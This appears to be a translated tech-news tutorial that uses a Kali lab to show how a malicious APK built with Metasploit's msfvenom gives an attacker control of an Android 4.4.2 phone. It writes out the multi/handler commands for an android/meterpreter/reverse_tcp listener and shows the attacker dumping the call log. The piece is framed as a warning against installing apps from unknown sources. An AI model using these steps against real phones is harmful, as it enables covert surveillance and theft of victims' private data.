Shulou(Shulou.com)05/31 Report--

This article shows you how to use Metasploit to control Android phones. The content is concise and easy to understand. It will definitely make your eyes shine. I hope you can gain something from the detailed introduction of this article.

How to use Metasploit to control Android phones

Now everyone's life is inseparable from one thing-mobile phone. App on mobile phones brings a lot of joy and convenience to our lives, allowing us to know everything in the world without leaving home. However, not all apps serve us, and some apps may approach us with malicious intent. If your application is safe to download from the official app store, it is more dangerous to install it from an unknown source, such as an online forum, or someone else's "unreliable" download link. So most Android phones pop up the following reminder when you set "Allow unknown source apps":

Don't underestimate this "fence," he may block waves of malicious App attacks for you. You might turn it off disapprovingly: I'm just installing an App, it's not stealing my money.

Below, I'll show you how dangerous apps of unknown origin are from the perspective of a malicious attacker!

Environment:

Attack aircraft: Kali

Target drone (victim): FreeBSD Android 4.4.2 virtual machine

Process:

First we look at and record Kali's IP address: 192.168.1.112.

Use msfvenom under Kali to generate malicious APK, which is the installation package of Android program. LHOST is the ip of Kali. LPORT can choose an unused port at will.

We successfully created an apk, so we left it there. Then start metasploit's monitor and open msfconsole (complain, why do many programs under Kali have such fancy welcome interface, I don't understand the world of big shots).

After opening, enter:

use exploit/multi/handler

set Payload android/meterpreter/reverse_tcp

set LHOST 192.168.1.112

set LPORT 4444

In this way, the attack module, Payload, and the listening port for receiving the rebound connection host are set up, and the attack can be started.

Enter exploit and wait for the result.

Now, we started mimicking the victim and received an apk from an unknown source via email with the name "hh.apk."

When I started installing, he didn't prompt me with "unknown source," probably because this Android version was older and there was no awareness of information security at that time.

Thus, the installation is complete, and we have unknowingly stepped into the "attacker" trap. Click on the app and nothing responds. But in fact, we are already under the control of the attacker.

As shown in the figure, it is a reminder that the victim has been monitored. In the figure, 192.168.1.100 is the ip address of the Android machine.

Under this page, attackers can basically control all functions of the phone, eavesdrop or view all files of the phone. For example, the "dump_call log" command in the above picture downloads all the call records of Android and generates a TXT document.

This is my analog phone, call records of three communication carriers, 10001, 10086 and 10010 respectively. From the picture, you can clearly see the number dialed, the duration of the call and the way to call and answer. Of course, there's more to it than that.

The above is how to use Metasploit to control Android phones. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.